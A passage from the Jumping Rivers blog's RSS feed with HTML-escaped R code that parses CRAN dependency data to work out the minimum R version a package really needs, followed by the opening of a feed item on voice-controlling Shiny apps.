&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;(pkg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!!&lt;/span&gt;type) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;separate&lt;/span&gt;(pkg, sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\(&amp;#34;&lt;/span&gt;, into &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;right&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(version, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\)&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(package, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\)&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(version, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\n&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(package, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\n&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_trim&lt;/span&gt;(version),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_trim&lt;/span&gt;(package)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;## Detect where version is&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; version_loc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_locate&lt;/span&gt;(av_clean&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;version, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[0-9]&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_clean &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(condition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_sub&lt;/span&gt;(version, end &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; version_loc[, &lt;span style="color:#a5d6ff"&gt;&amp;#34;end&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_sub&lt;/span&gt;(version, start &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; version_loc[, &lt;span style="color:#a5d6ff"&gt;&amp;#34;end&amp;#34;&lt;/span&gt;])) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; depend_package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; package,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; depend_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; version,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; depend_condition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; condition) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(depend_condition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_trim&lt;/span&gt;(depend_condition))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;clean_r_ver &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(vers) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nas &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(vers)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vers[&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;nas] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(vers[&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;nas], &lt;span style="color:#d2a8ff;font-weight:bold"&gt;if_else&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_count&lt;/span&gt;(vers[&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;nas], &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;.0&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vers
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;max_r_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(r_versions) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_split&lt;/span&gt;(r_versions, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.&amp;#34;&lt;/span&gt;, n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; major &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(s, `[`, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(as.integer)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; maj_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; maj_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; maj_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; minor &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(s, `[`, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(as.integer)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min_number&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; minor&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[which&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; maj_number)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; third &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(s, `[`, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(as.integer)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; third_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; third&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[which&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; maj_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; minor &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; min_number)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{maj_number}.{min_number}.{third_number}&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;get_r_ver &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(pkg, clean_av) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r_cur &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; clean_av &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(depend_package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;R&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; pkg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(depend_version) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(r_cur) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) r_cur &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pkg_dep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;package_dependencies&lt;/span&gt;(pkg,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; which &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Depends&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Imports&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;LinkingTo&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unname&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(pkg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Optional and recommended packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; with_r &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(av_pkgs, &lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(priority)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pkg_dep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pkg_dep[&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;(pkg_dep &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; with_r)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r_ver &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; clean_av &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; pkg_dep) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Depends&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(depend_package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;R&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(depend_version) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;max_r_version&lt;/span&gt;(depend_version)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clean_av &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; pkg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(r_real &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.character&lt;/span&gt;(r_ver),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r_cur &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; r_cur)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Voice Control your Shiny Apps</title><link>https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/</link><pubDate>Mon, 15 Oct 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
